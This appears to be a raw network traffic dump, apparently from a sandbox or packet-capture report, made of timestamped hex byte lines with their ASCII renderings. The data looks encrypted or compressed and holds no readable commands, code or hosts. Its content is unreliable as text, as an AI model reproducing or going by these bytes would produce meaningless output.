                                                                                              2021-12-13 23:57:13 UTC2735INData Raw: 9e f5 75 3e f6 60 f6 57 7c d4 ef f9 c1 a3 dd b9 ed 33 0e 2a fd 48 56 c0 d7 6b ec b8 fb bb cf 80 fc dd 1b 59 18 89 b0 64 51 a8 77 11 fe cc b3 69 a1 f9 ad 71 07 c7 03 ba a6 55 4f 86 6c 9a d9 c2 b4 8d 59 2b 6a 7b d0 8f bb 38 d7 1d 70 93 6d 48 96 58 6b 02 39 cb 4c 93 29 2d ca 73 fb e3 f8 1f f2 21 78 61 5f ee 71 e0 70 2f ce f6 b5 4a 83 d3 1d c1 a0 36 f6 ca 4b 1d 99 d3 ad 82 a6 99 e3 1f ba 80 93 f6 b0 cc 07 8f 0f dc f7 98 df 8c a1 20 db 77 d6 aa 11 23 77 bb 17 c5 a5 c1 30 dd 0c 95 30 fd 36 88 6a 50 48 3e 3d e1 23 cb ed 99 f3 c8 06 2c 7b 47 fc 29 d8 17 5b 15 c1 9f 66 6a 39 81 c4 bb 9b d7 cc 11 1d 01 e6 67 fb b7 0c 0e 40 64 e6 ca a8 30 fb f2 bf 7f b5 a2 4b 17 fb 91 65 a7 de e3 e8 c3 47 07 41 38 e7 fa 04 4c 86 10 94 0f b4 92 0a 84 d6 b9 ad de c2 37 c9 42 6a e3 ef
                                                                                              Data Ascii: u>`W|3*HVkYdQwiqUOlY+j{8pmHXk9L)-s!xa_qp/J6K w#w006jPH>=#,{G)[fj9g@d0KeGA8L7Bj
                                                                                              2021-12-13 23:57:13 UTC2736INData Raw: 15 0f a4 67 86 34 16 d9 14 0e 19 43 bc c1 a4 17 c8 ab 84 3b 2f f6 1f 6b c7 16 99 74 de 58 5b 52 d4 7c d6 81 9c d4 38 55 61 26 ef 6d b0 76 f3 61 e6 fe 32 bd 4a 9c 13 5a 14 62 e0 4f c0 41 92 4e 94 29 dd 96 7c fa e5 d4 f8 b2 7f 87 ad 6c b1 9a 99 f1 2f 7c 12 af 65 7d 46 7e 04 2c 76 51 42 3a 88 18 4e b8 79 89 e7 25 ec 0a 2f 91 22 0e 6a 75 08 17 bc 8d a6 27 45 dc ec 26 c4 a0 a2 c9 c6 77 d2 25 32 72 a0 c2 b3 ec 45 40 60 d8 e0 dd d9 50 04 87 ad 2c e5 d1 db 98 14 ef af 29 c2 d3 78 86 2a 08 b1 06 a4 04 ab cb c9 d1 03 a9 03 b1 fb e8 f1 ab 01 bb 29 55 c5 26 e3 c0 1d fd 3d 3e 91 2c 00 6b cf 94 1e 5a ff ff f6 23 de 96 1d 08 83 50 1d f8 2a 11 13 c9 20 5e 03 a2 10 55 cf 34 44 85 17 c4 7d 62 72 89 22 b7 0a dd 63 38 ac 06 36 08 7c 55 29 5c 76 34 52 1d 47 1f 91 15 18 e4 f4
                                                                                              Data Ascii: g4C;/ktX[R|8Ua&mva2JZbOAN)|l/|e}F~,vQB:Ny%/"ju'E&w%2rE@`P,)x*)U&=>,kZ#P* ^U4D}br"c86|U)\v4RG
                                                                                              2021-12-13 23:57:13 UTC2752INData Raw: b0 c1 a2 04 32 fb ee ce 5a a0 cb 9a bb f2 77 38 81 84 d7 98 81 26 a7 fe 02 80 6d 88 83 d5 03 e8 f0 8a 46 b1 a1 ee 10 83 1d ac a3 72 3b 30 d4 8e ad 33 2c 18 5f f2 0c 13 ec b2 b8 42 ef bc 59 eb 32 0f 96 55 32 a4 4c df 67 6f 3b c5 15 4c 43 70 db 0f bc af 50 20 5d e3 1c d1 d2 75 bf 7b 40 d6 5b 0c a6 31 d3 e5 e3 f9 db 66 9e 9e f5 74 cc 65 81 c6 12 a6 ca 7a aa 00 6a 23 d3 1f 0e 4f cb 82 52 e5 3c 71 b7 a1 78 cb 69 23 83 1d 1a bd 19 e3 23 64 16 6e 50 b9 75 17 f6 a3 f3 53 53 89 61 e1 c9 d3 07 b4 cb 6e 10 74 95 b9 e4 ec 2a 0d 2a ec 16 de a7 b5 60 06 6f 7c aa 57 45 bb 02 cc ef fd a4 30 6a ca 5e a9 8c 36 95 76 c9 8c 92 b8 fc d9 73 03 d8 86 74 e3 fa d8 70 3c 87 64 c8 12 8b 0b c6 6a 6d d1 22 86 68 e6 bd 4b fa 9f 9a 59 03 9c 91 e6 85 13 b6 24 12 ae 00 29 f8 88 54 b8 8b
                                                                                              Data Ascii: 2Zw8&mFr;03,_BY2U2Lgo;LCpP ]u{@[1ftezj#OR<qxi##dnPuSSant**`o|WE0j^6vstp<djm"hKY$)T
                                                                                              2021-12-13 23:57:13 UTC2753INData Raw: 84 c7 0c 7a 4c a4 c4 ca 6d d2 1d e4 57 5a ee ab 12 61 88 9b 02 80 49 e5 9b e3 9c f4 07 dc 6b 4a 37 a4 1b 4f a6 45 e2 7e 6d 53 87 17 68 0f f1 10 1a f5 e0 63 58 56 2e 7b 1d 84 5e ed b2 14 6a 9c 2c 9f e3 04 44 db ca 07 bc a2 23 b0 c9 61 d8 30 8e 19 1d 16 93 fc 50 08 e9 15 e7 29 79 c2 7f b3 0a b9 23 6e 2b 81 ec 2c af 2e 56 c5 11 75 02 1d 3d f3 ab e2 db 88 2d 98 61 01 ce 2c 27 c3 48 6a 39 62 70 c6 5c 99 bd b4 19 53 cf fd 05 06 4d 33 57 67 b1 df ee fc 6b 7a ff 87 a5 87 21 30 c3 21 7e 3f c9 36 7b 5a 63 40 bf 8d 3a bd a1 97 fb 6a f2 74 9f 18 fb eb a0 4e e3 ef 13 0c 97 52 29 87 cb 77 92 f7 85 8b 46 29 e8 3e 34 1e 81 40 91 26 4f c5 bf 00 26 27 1b 58 8b 4e 30 a9 ec ae ba ba eb 93 70 38 d7 a7 86 4a 9e 2b f4 73 81 21 ce eb 82 9f fc 10 f8 d7 14 d7 91 ea 47 a4 89 fb 02
                                                                                              Data Ascii: zLmWZaIkJ7OE~mShcXV.{^j,D#a0P)y#n+,.Vu=-a,'Hj9bp\SM3Wgkz!0!~?6{Zc@:jtNR)wF)>4@&O&'XN0p8J+s!G
                                                                                              2021-12-13 23:57:13 UTC2769INData Raw: 56 99 7d 8e fa 91 db 63 8d 08 c3 ab 7f b6 d6 a2 dc 4a c0 8b fe d6 2b 00 61 11 16 28 af e3 ed dc 8d c4 7c 1a 81 18 23 88 7a fa 5c eb b6 2e 1d 51 b7 3c 95 7e 33 48 2e 8b 4c db 4e 71 f4 00 13 24 20 7c bc 7f d1 1a f7 cb 1e 3a f9 93 10 cd c0 8a e1 13 d1 e3 a4 c3 9d f5 79 44 d6 74 e3 6c b1 1b 33 29 7c 70 5b 96 f2 92 b1 d7 d4 ca 49 93 e1 19 1a f9 b2 d4 da ab 25 f7 72 6d 38 32 2a 41 08 1d f2 3a 6a a5 96 f3 bb f6 8a 6f 12 d1 d4 a0 97 c1 84 0b ab 2a 70 a3 8c 05 0a 18 36 79 dd 5d 40 b2 b4 7f a5 13 a9 60 f7 65 26 92 a4 d7 2e 2b b3 1a cc 8d 36 bc 6d 33 b9 fa 88 ea 60 47 4c d9 ab 54 9c b1 b5 fd 6c 69 cf 23 28 76 41 d4 5a 74 73 b6 a9 ad 48 4e d5 09 d0 90 68 6d ef 4a 6e 41 2f 39 fa a9 d6 3c f5 45 61 34 67 c1 6e 1c b9 7e 5a 50 46 29 c3 aa 72 58 69 40 b8 48 43 85 24 4e 4f
                                                                                              Data Ascii: V}cJ+a(|#z\.Q<~3H.LNq$ |:yDtl3)|p[I%rm82*A:jo*p6y]@`e&.+6m3`GLTli#(vAZtsHNhmJnA/9<Ea4gn~ZPF)rXi@HC$NO
                                                                                              2021-12-13 23:57:13 UTC2770INData Raw: 30 df 9e 3e fd cf b9 d3 31 e6 97 2a 4e ec bb 71 e9 a0 8e ca 4e 83 b2 ad 15 10 80 fd 25 eb cb f3 57 83 93 61 96 90 c9 cc 12 a8 1a 54 ae 61 34 8b e2 63 91 f7 2b e0 ab 98 c4 c9 a0 4d 90 7e 66 4d 10 75 bb ee b0 ba 98 a3 82 b6 e7 45 2c 1c cc 63 4b d7 19 84 a4 0e f3 da 41 10 53 fa 3b 84 fb 1d 5c 89 24 cf 1f 5e 28 63 d7 a4 c3 4a e1 ca 5f 5c 65 d4 ba ce 8e 14 af 11 9e 2a 3c 26 1b b6 25 c6 f7 a1 36 c7 97 9e 6c 0a b0 42 18 b4 1a 59 b0 f8 d2 f4 5d 0f 51 1d cf 22 c5 12 ad 7c 54 06 c7 a6 48 bd 73 e3 62 1f 48 dc 9c 46 99 62 5b 31 43 64 93 24 65 99 ff af 8a 01 b6 5f 69 82 a2 51 b9 b3 81 64 15 77 cd 92 31 da 2a ec a9 36 4c f5 bf ad 10 5a 8e 47 7d 71 8c f7 e7 2e 69 c1 84 63 d8 b5 51 44 d4 8b 75 9f a8 fa b0 84 c3 06 3c 4f 87 91 c4 1e e6 a9 7e 6d d1 57 09 fc 66 78 ce b0 33
                                                                                              Data Ascii: 0>1*NqN%WaTa4c+M~fMuE,cKAS;\$^(cJ_\e*<&%6lBY]Q"|THsbHFb[1Cd$e_iQdw1*6LZG}q.icQDu<O~mWfx3
                                                                                              2021-12-13 23:57:13 UTC2786INData Raw: 12 0e 18 3a a6 9d 90 0f 74 ee 9d bc 69 1f 8d 15 fd de 02 32 f2 af 76 c4 de fe 63 69 90 40 87 90 74 a7 2e 63 74 55 52 4e 7c 56 da 9a b6 5c e2 c2 02 10 20 d0 a9 ca 06 8a 21 18 08 ae 5e 24 67 83 62 87 fb f5 e4 8f 4d 2f 10 93 2c df 0e b2 20 5f 72 0e 53 b7 c3 67 75 8b 6a 0d 76 94 45 d3 c2 a5 aa a1 8d 5a a8 fc dc 42 29 85 72 ed d7 57 a3 42 c2 34 21 27 f6 e6 1f 8e d1 2b 48 5e 89 61 04 f1 d1 5a 9c 3b b4 aa e9 30 87 fd e0 63 fc ce a5 20 2a 1a 2c d1 15 38 f6 e4 72 4c 83 5a df 33 e5 53 4a 0c 3b 9b a3 d7 ad 5c 99 94 1a 1c c1 61 cb f2 f0 14 9a 2b f0 ba fe d0 2e c3 0e e3 a1 bf 38 f5 b4 c5 d7 9f 7b dd 08 31 05 f7 1c f0 ad 6b e5 52 0c 17 21 0a c5 26 6c 46 4d cf 08 de 5b c0 b8 83 33 3e 97 b9 38 e3 9a 2e 43 3a 95 f8 b3 83 4a 91 c4 fd a1 d2 9f 5b f7 61 fe 7c 9e d1 94 f7 92
                                                                                              Data Ascii: :ti2vci@t.ctURN|V\ !^$gbM/, _rSgujvEZB)rWB4!'+H^aZ;0c *,8rLZ3SJ;\a+.8{1kR!&lFM[3>8.C:J[a|
                                                                                              2021-12-13 23:57:13 UTC2787INData Raw: 17 8f 61 80 7b 74 24 9d 9a c3 77 66 6a 1a 40 68 7d 13 0f ed dc f6 da 08 ed ab 80 38 88 ef fd e3 90 3c c1 1d 4e a2 77 04 ba 67 43 26 df a9 5a f4 49 5d 1f da 18 33 e0 dd c4 c3 e4 1f 92 92 e2 fe 85 d8 2e 59 cd df 17 34 4f 0d 7d 1a 3c 57 e1 2c f8 df 65 aa 2d 9b 2d 41 22 43 53 cb c9 e5 fe 87 00 2c 29 40 c4 68 4f 2b f1 20 2d 9b e6 af 77 eb 3a 01 e8 75 81 e2 88 e1 83 fe e5 c0 ae 9b 7a 38 49 df 56 dd 62 2e 94 f1 9f 56 51 4b 8f 8e 27 61 e0 56 2f 81 8a 13 78 ec 9b 27 e1 da e4 26 dd 73 34 e8 be 44 ab c2 85 6f 11 27 29 5d d1 97 0d bb 85 ff f1 19 6d 12 55 68 e2 24 86 35 ec 5b 98 be 94 c6 88 68 81 30 71 22 3f 43 4c e4 8c 4c e7 b6 86 e6 70 6f 88 78 47 37 9b 2c 28 7d ad 55 1e 63 b1 9e 09 f3 21 73 46 d5 d9 28 3e be c7 19 ef ce ff 26 e9 06 0d 28 c5 1c d5 a1 7c 67 83 a6 cf
                                                                                              Data Ascii: a{t$wfj@h}8<NwgC&ZI]3.Y4O}<W,e--A"CS,)@hO+ -w:uz8IVb.VQK'aV/x'&s4Do')]mUh$5[h0q"?CLLpoxG7,(}Uc!sF(>&(|g
                                                                                              2021-12-13 23:57:13 UTC2803INData Raw: d1 0d c6 b7 0d 46 d8 6c c5 46 e7 86 ca 8b 2d 0e ed 87 67 c5 d1 db c3 79 76 6f 9e 7b 09 f0 12 9e c9 47 b5 6f 4e 1e dd 5c 67 ca 24 ff 46 de e1 d8 68 03 20 9f a7 85 85 58 e9 23 56 e2 5e 6e f1 52 5c dc 37 4d 47 09 3c 89 f0 ec bb 2a 16 3d bf 44 60 b6 00 4c 43 99 ee 0a b7 1c 1f 72 55 f9 90 e2 d7 4d 40 ab 7a c1 6e eb 6d 05 fd ad 07 27 ed f7 e0 8f 3c fd 38 c5 be 41 e0 14 32 1c ae 85 9d 36 5f 35 93 38 37 b1 6e 71 84 e9 09 74 4a 9a 51 5e c3 40 e7 ac b5 45 9c 38 49 e6 93 c7 f8 12 ba ac 4b 00 d9 c8 c0 a9 fe 92 45 e7 f6 a0 e8 ad e4 12 e4 a3 fc 9b a0 26 50 06 24 3b c2 4b b5 62 f1 5a 48 00 21 31 58 d9 b8 9e 07 69 63 47 91 64 07 83 16 9d c1 de 53 cc 21 03 f2 13 84 ec ea 80 f8 03 51 a9 42 24 8a 6f fa fa 19 37 91 f4 f7 ab 86 83 d7 0c 44 76 1e f7 87 be b2 7a aa e5 e1 55 df
                                                                                              Data Ascii: FlF-gyvo{GoN\g$Fh X#V^nR\7MG<*=D`LCrUM@znm'<8A26_587nqtJQ^@E8IKE&P$;KbZH!1XicGdS!QB$o7DvzU
                                                                                              2021-12-13 23:57:13 UTC2804INData Raw: 40 5d 88 0b 41 aa 99 f1 63 6c cd 7a 64 2a 5d 98 79 0e 3a 38 3b 94 1f 5e 1e cc 3f 42 13 66 53 1a 90 7d 42 0b 02 ab 01 5e c6 3b 12 5a e4 29 eb 21 d7 02 f5 1e 1b 90 64 23 a9 47 e7 45 3b 89 dd b3 ba bc 0a 92 ed fe fc 6a b4 72 ae 1f c7 db 4f 85 cd 21 95 c6 40 94 cf 32 43 71 8c 43 08 a4 5c ba 0d 6b 44 e0 27 a6 9f 16 47 40 d9 36 94 83 27 9b fc 1d a4 5d 3d 00 8f 56 7d 18 d2 09 92 7f 13 1c 4e cd 9d 3e 43 82 1f 6a a7 cb 91 88 a5 24 69 30 06 c0 45 cc 3e 38 fa b7 6e 69 63 f0 f8 69 a7 43 52 70 d6 5a 41 2a cc 70 34 bd fa e9 4c 9b fa 05 42 bc 0d 3e 8f 45 9c fe 98 2b ef de 83 10 70 3e 07 3f bf 1b c5 a2 a4 35 59 79 0f 87 04 f9 d9 e8 22 e4 80 be 7f c6 49 20 b7 a2 76 82 c7 35 fa 68 03 34 0f 84 fd 77 b9 76 45 aa 84 56 2d 4c 12 85 d1 33 d1 1e 3c 44 a3 0c 88 28 98 0c 51 fe 49
                                                                                              Data Ascii: @]Aclzd*]y:8;^?BfS}B^;Z)!d#GE;jrO!@2CqC\kD'G@6']=V}N>Cj$i0E>8niciCRpZA*p4LB>E+p>?5Yy"I v5h4wvEV-L3<D(QI
                                                                                              2021-12-13 23:57:13 UTC2820INData Raw: d0 25 85 31 6c a6 0e 92 b9 d9 61 d3 a8 1b c0 7f 69 82 f6 20 f4 e6 2e 60 4a cf cf 6d 0d 49 fb c2 86 7b 52 be 4c ef 40 ab d9 ba b9 ce a3 b7 98 cf a4 19 05 e1 eb 0c c9 7c 2d a6 5f 3b 1a 23 fd 71 92 b2 a3 c6 40 c5 34 0e c3 68 d8 b1 a5 b4 f1 8c 79 c4 dc 93 9f 62 38 75 70 89 5b 6c 2e 38 f6 e0 96 98 b2 9d 7d 1a 40 8d e9 89 92 48 9f 1a 50 4c 77 43 9e 41 b5 58 f5 2c 81 87 89 89 9c b5 05 40 0c 38 68 f9 97 59 0d 56 e1 fc f6 76 f0 19 d4 11 43 3c 22 9c 72 f8 20 4d 9a 9b a6 2d da a1 76 83 35 8e ec bc 30 b7 7c ab 24 83 9b 7f db 89 0c 14 19 bd 34 68 50 1c 4a 0c 68 c8 c4 be 64 95 0a a7 5d d1 36 19 dd 36 f3 b3 90 f3 0b 68 25 0d 1c f4 8e 3f d7 3b f4 f2 0f 97 57 de 06 b2 70 87 28 b7 ca bf ee 43 66 d4 84 e2 a6 3b 94 b8 9b 62 6b ef 06 79 94 73 0f 1e 90 20 7e c4 a7 60 cc 50 67
                                                                                              Data Ascii: %1lai .`JmI{RL@|-_;#q@4hyb8up[l.8}@HPLwCAX,@8hYVvC<"r M-v50|$4hPJhd]66h%?;Wp(Cf;bkys ~`Pg
                                                                                              2021-12-13 23:57:13 UTC2821INData Raw: b8 d3 2c 5f 6e 86 4a 2e 60 17 60 de d2 ca 6c e1 1e 46 cd 4f 6d 7a 35 26 9a d4 d5 08 d7 c2 f2 5a 01 63 35 17 f2 65 3d f1 ce fc ba 46 f0 1f 6b 22 fc 16 5b 0c 73 19 44 17 0b 07 06 59 47 5d e5 d9 6b 5e 40 5e 18 21 10 39 aa 02 60 2c bd 1b 31 c2 1d 49 e1 a5 60 cb e4 eb be 27 51 45 e8 70 c3 2e b9 e4 bb 3b ec 94 b6 73 8e 0e fc 30 01 5f 83 31 64 ef d7 8f 22 ec c0 ff e0 7e 14 6f f6 5d c2 c1 c7 d8 e5 fc 1d c0 df a3 6d b0 ad ff 97 43 ba f3 3f 69 68 f4 ff 43 6f a5 03 74 0c ad 85 89 e7 d2 b0 22 c2 0c aa 4d b9 0c 28 76 6b bf f4 b5 a9 11 76 df 4b 65 5e ce 6a 88 93 0f 02 bb 3d 8a 3e 10 ce dd 1c 3e 29 77 7d dc 80 7c c9 42 43 48 36 5f a5 32 35 87 d9 54 ff c5 de 25 e1 5f 61 e0 e8 96 bc 5d 6b 65 9b de de a7 e3 ce 5e 07 31 6f 24 cc 7f a6 6f dc d4 d9 06 3b 6b 99 cd 5b 42 4e c9
                                                                                              Data Ascii: ,_nJ.``lFOmz5&Zc5e=Fk"[sDYG]k^@^!9`,1I`'QEp.;s0_1d"~o]mC?ihCot"M(vkvKe^j=>>)w}|BCH6_25T%_a]ke^1o$o;k[BN
                                                                                              2021-12-13 23:57:13 UTC2837INData Raw: 85 3c 24 9b 17 a9 9d 68 88 cd 35 dc 39 3b 4d 33 16 42 7d 26 42 7d bd b5 fc 7a f2 b9 32 e2 63 f7 a1 83 97 d2 64 7f 38 63 4d 85 6a 7d a4 b5 8a 1e f9 ae 9a 56 e7 0b b6 4e 88 f2 51 c8 a7 81 d9 e0 9c a0 53 21 88 50 5d b2 1a 74 9e 55 36 70 90 59 55 89 78 1c 65 b5 dd 1e 49 d3 bf f7 24 80 08 d6 65 c6 41 1a ad c7 e1 a2 e3 22 b5 fa cd a4 f9 ce b4 fd 9b 0d 7f 86 8a 22 9e b1 57 f4 80 3b 38 b6 03 fc f5 8f ec 03 6a d7 71 07 95 45 b7 ad 49 d4 5d 1a 53 59 81 05 9e 1c 6f 15 90 74 0c d3 48 41 a0 81 0e 0a 83 74 59 56 d9 b8 d1 64 88 31 2d 04 2f 40 fb 5c a4 52 8c 76 df 09 a8 d5 c4 62 5f af 04 e3 32 93 a8 90 18 59 64 98 3a 34 fa 12 ca ff 1d 43 de ac 98 0c e2 49 5f 63 2d 26 3b 6e b1 03 f4 a0 4a 78 d2 b9 36 12 07 8e 76 33 ca d7 77 f4 fb 8f 12 3a 3a 19 10 83 ad 9a a3 9c ba 3d 08
                                                                                              Data Ascii: <$h59;M3B}&B}z2cd8cMj}VNQS!P]tU6pYUxeI$eA""W;8jqEI]SYotHAtYVd1-/@\Rvb_2Yd:4CI_c-&;nJx6v3w::=
                                                                                              2021-12-13 23:57:13 UTC2838INData Raw: 38 87 ff 39 fe ea 9b f1 79 47 e4 0a f3 86 3b ba ce 8f 02 71 d2 66 62 9d 38 ea d9 ad ac 3a 0a e6 17 08 65 87 2b ba 8c b9 5e 4e 84 a2 56 84 68 5d c7 42 62 02 0a ae 57 92 81 d5 bc 17 09 aa 80 83 d4 b0 82 b0 22 59 92 06 e0 65 fd f4 79 ad c0 89 8a 4c 53 a4 c1 5a 24 ff a7 1c d5 92 30 9c 7f 46 e7 e8 a7 02 8d 8e 38 d1 2e b9 58 c5 d7 aa f0 50 fc bf f8 33 30 06 ea 92 c8 a1 26 13 82 1c 8f 80 24 14 b6 0d cb 24 ca 81 77 1b 51 89 04 51 60 0c d7 ad 0e ae 68 da 79 95 d2 41 c5 11 41 d1 f0 7e 7e 60 d8 dd 1b 85 24 98 7a 99 97 ed 3e f8 32 23 01 db 3b ad c4 f5 35 fc 58 e1 1b 69 2b 35 25 c4 1a 07 6d de c2 28 ff f9 58 56 ec bf 7e 72 5b 49 c5 34 42 9c 2f c8 4b d8 a1 be ed c4 6d 20 a6 65 21 8e 3e 4d 9f 7d 18 8b b8 ce 01 d8 38 ef 3d 9b 5c 61 b8 5a 00 46 8b 16 ea dc 3f 89 4f ab 88
                                                                                              Data Ascii: 89yG;qfb8:e+^NVh]BbW"YeyLSZ$0F8.XP30&$$wQQ`hyAA~~`$z>2#;5Xi+5%m(XV~r[I4B/Km e!>M}8=\aZF?O
                                                                                              2021-12-13 23:57:13 UTC2854INData Raw: a0 26 ce 4d f7 3d b5 42 a1 c7 23 a9 61 0e 50 d3 59 8c 97 d7 2a 7d a2 f2 2a 79 b8 83 ca 89 c3 b1 ce 85 8b 15 fb bc ee 58 42 21 89 16 4d 09 1a 87 57 61 54 da c3 d0 3c 84 3d 5a 2f 9a 93 17 4c 4a 28 b1 07 89 19 cf 8d 67 98 e4 95 ff 5b 0d f4 a5 9d ac 16 35 24 d8 47 db f4 67 8f be dd 94 b7 cd 24 0d c3 ac d3 af a6 c5 6b 9c 53 1b 35 01 c8 52 ca 11 0d 5f 1e ef 06 65 33 03 cd 5a b6 d3 74 b0 ca 96 66 f7 6c 82 e3 f9 db e2 a8 63 79 71 47 7c ea 46 e6 01 29 41 d7 2c ec db 68 04 e8 67 f1 37 3f 1c 25 c4 db 06 2f 53 4b 13 22 04 46 7f 75 71 63 e8 6f 4f a8 fc 89 51 16 e4 4e 14 92 25 e5 05 68 71 ab f4 de 7c 75 58 e1 dd 4e cd 2d 17 0f 2a 9f 5d 6d d0 d7 33 b3 b5 df b0 ff 4b aa 73 17 13 7f 1e ae 11 a2 5a 4f 5a d7 1e a8 9f a8 aa 5c c5 0e d2 b1 45 f9 c6 70 19 b0 87 68 9c 92 df c2
                                                                                              Data Ascii: &M=B#aPY*}*yXB!MWaT<=Z/LJ(g[5$Gg$kS5R_e3ZtflcyqG|F)A,hg7?%/SK"FuqcoOQN%hq|uXN-*]m3KsZOZ\Eph
                                                                                              2021-12-13 23:57:13 UTC2855INData Raw: ee dc 3b 49 44 9c d7 87 e5 33 ad 34 dc d9 19 b8 99 1a 0b 0c d4 39 59 64 ce d9 92 00 04 04 c3 1d 11 f9 57 db 48 f8 7e f8 0d f0 de 79 f8 c7 4a ac bb ab 47 ed 98 d7 a3 4c a1 43 40 61 68 ae 47 5a 86 3d b1 b2 c2 df 54 3c e8 e1 98 2d 80 ef fe ae 00 8c 4b 5d 8c e2 fc 0b 01 5e 4d f8 2c 36 37 c5 cc 2e f1 73 9b b1 98 53 0a 86 d3 0a 7b 12 02 4f 74 73 af 57 aa 9e ac 3b df e5 6c 87 c6 42 8b 72 cc 6b 59 d7 aa 8a 88 1b b8 4f bf fb f7 c5 52 47 f8 07 61 7c b2 bd 6d d4 ae 86 fd 86 c4 25 04 ea 62 83 e6 a0 57 3d 8e 29 e1 9b b9 f1 20 99 69 6b ca 7f cb 11 24 5c 0f 60 9f e5 06 38 d8 ab ad 6b 0c d3 24 62 8e 6d 07 65 97 fa a4 f9 8e e2 98 25 8f e5 12 15 3a 14 81 02 59 20 08 67 e9 b2 52 36 ad 10 3d 99 5e 6b 95 ef cc cc af 32 a9 57 87 8e 0e 6f 71 16 8c c6 e3 1d 5f 68 26 11 36 f5 82
                                                                                              Data Ascii: ;ID349YdWH~yJGLC@ahGZ=T<-K]^M,67.sS{OtsW;lBrkYORGa|m%bW=) ik$\`8k$bme%:Y gR6=^k2Woq_h&6
                                                                                              2021-12-13 23:57:13 UTC2871INData Raw: 5d 41 aa 7c f6 1e 86 38 a3 a8 f7 aa 1f d3 ed 86 9f a7 e3 d3 ba ed 2a 7f 32 69 4c fc 49 76 d1 66 6c de 2e f0 65 48 12 7a 0e f7 0d 14 22 83 41 72 9d 29 a1 ce f7 53 0d 06 4a a0 b2 16 1b 93 22 ad 26 3d 12 ab 80 9f a3 f1 e7 87 2e 4d 7d f9 a0 a9 42 37 09 7b a6 f5 fe 93 11 b3 03 7d 3b e1 cb a9 19 af 5a 39 36 6c 58 86 88 25 22 9d 8e d3 94 c5 4b 69 ed 8d dd 51 dd 49 2f 12 a4 29 12 14 5b 47 36 45 ce 72 74 b4 50 6f 7b 30 73 1b 7f 03 17 c4 5e 8a 45 17 4d a9 c9 61 98 59 62 cb a9 11 dd ba 0f 02 ee 23 e2 c6 2e 6c 81 c8 99 79 80 cf a2 1d de 77 08 eb 5b 76 38 60 ba 45 f9 62 40 2a df 9d d6 31 2e ef 52 a4 7f c8 f1 5c fe a2 c8 e3 e1 fa cc ed 34 79 8a aa 5c 98 8d 63 6a 90 d2 3d 03 a4 7e 6c 8f 3f d3 da 99 73 1a 1a c5 12 3e cf 39 5d 08 96 a4 e9 ab f4 cb ea 21 6e 8a a4 0f 0a fe
                                                                                              Data Ascii: ]A|8*2iLIvfl.eHz"Ar)SJ"&=.M}B7{};Z96lX%"KiQI/)[G6ErtPo{0s^EMaYb#.lyw[v8`Eb@*1.R\4y\cj=~l?s>9]!n
                                                                                              2021-12-13 23:57:13 UTC2872INData Raw: 22 5e 89 13 c9 df 97 21 c9 29 0c 9d 62 52 56 ad 68 4e ad 1d b7 cd 2f ee 8a 68 e7 4f 79 8a 6c f8 18 db 75 55 7f 00 69 35 1d 94 40 5d 49 53 04 5b d7 eb ac 24 e2 e6 85 6b 86 ad 43 fe fb 76 da cd 25 32 6b a0 a8 26 ac 37 45 46 b2 f4 7f 4a 33 86 f0 8d b6 96 dd 85 d3 26 b6 27 56 37 25 4f 5d 85 11 36 8d 38 09 b9 56 ee 60 da b6 9f be 79 8c 87 7b 3a 4f 6f 08 7e b5 c0 05 29 84 1e 97 ae ad 59 1d 87 18 be e2 85 21 e6 87 16 bd b3 68 5a 29 62 bb 31 8b 64 f3 54 7e 69 cd d4 91 cb 27 ef df 7d ed 8f 3a 41 e0 da 93 1a 44 fd d3 d8 f4 2c 98 be b5 07 4a dc df 7a 35 38 4e 51 33 48 dd 94 13 ca 02 7e f7 4c c8 78 64 0e 8d 6e 63 50 aa 1b c0 ed d7 39 95 74 2f 6b 1c e8 41 9f a2 21 bb 27 a1 a9 05 c6 42 53 66 40 b7 21 30 c8 6d 48 2f b5 0e fe 28 18 bd 4c df a1 8b fb fe 7d e4 dc d0 e2 9d
                                                                                              Data Ascii: "^!)bRVhN/hOyluUi5@]IS[$kCv%2k&7EFJ3&'V7%O]68V`y{:Oo~)Y!hZ)b1dT~i'}:AD,Jz58NQ3H~LxdncP9t/kA!'BSf@!0mH/(L}
                                                                                              2021-12-13 23:57:13 UTC2888INData Raw: 9c d3 81 5c 25 eb f4 91 6a a5 c1 fe 6e 7e 50 61 0b 19 2d cf 77 5e 38 fd 5d 85 51 f0 09 28 83 6c 55 9d b2 17 7e 56 41 19 c9 1c 25 0a 05 d1 5f 83 ed bb e4 f6 c3 c8 dc b1 12 0f 3a 0d df 16 d3 a0 57 df 3a 77 11 e9 11 64 67 e8 2b b4 44 d3 99 56 cc ab 1d 30 39 56 c0 03 15 00 e7 3f 3a 74 9e ea 78 15 3c 70 b1 aa 93 0a 99 e2 75 f8 36 60 5d 64 6e ba b2 bd 79 a1 48 b4 b5 b6 4e 57 a1 5e 89 35 4d bb 1f da b9 45 56 9c 20 c7 7e 4c f9 be c9 f7 fe 54 21 6a 69 04 f3 7c 3e fa da 8d a1 cd b1 e5 5c 00 99 97 69 07 e5 c8 89 58 a5 44 d1 55 51 76 fb 9b ac 92 05 19 10 3b 35 c7 97 63 fb bb 11 ba 14 94 41 0e cf 75 d1 81 0c a2 5e d2 89 a0 61 ea d0 ec 87 f4 90 81 f4 1d 2e 1b 3a 77 af ab 33 b0 a0 87 30 54 ab 65 ee dc 2d e3 d1 be 31 76 f1 a3 c9 64 53 8f 50 da ca 88 4e 1e 41 aa c0 5d d0
                                                                                              Data Ascii: \%jn~Pa-w^8]Q(lU~VA%_:W:wdg+DV09V?:tx<pu6`]dnyHNW^5MEV ~LT!ji|>\iXDUQv;5cAu^a.:w30Te-1vdSPNA]
                                                                                              2021-12-13 23:57:13 UTC2889INData Raw: f7 29 35 d1 9f ed d5 3a 61 85 51 3c 8f 9f 23 bd 37 08 31 11 54 d4 a6 ad cc 3f 54 5b ad e7 68 2e 3b 64 ee f6 27 0a 34 63 98 2d d7 14 25 c3 2e e5 68 e6 f1 b2 67 b7 2b ad 0a 3e 4a 4b 71 af 18 fc 7d fd d4 a9 bb ca 98 f8 db 8a d2 01 32 2a 6f d0 22 b3 cf b6 6e 50 d4 b1 b5 4d 47 54 d2 d0 e8 db a4 cc 2b 43 ea 7c f1 b3 0e a8 c2 65 80 0d ad 0a 71 dc 67 ce fe b5 f3 3e 2d ba 73 40 b8 3e e3 56 65 43 5a 31 54 e9 f2 99 c2 ee 76 5b a8 0c 03 1b ce 1d a2 44 5e 77 92 af 22 90 6d e2 e3 f8 9e 0e 94 71 0f 52 af 22 93 3b 5a e5 b2 51 3e ed fc 57 e4 ed cb 59 55 d3 03 31 2f 8b 12 ef d3 5c e2 1c 4e 32 55 22 7f a3 26 b4 66 7d f5 e2 95 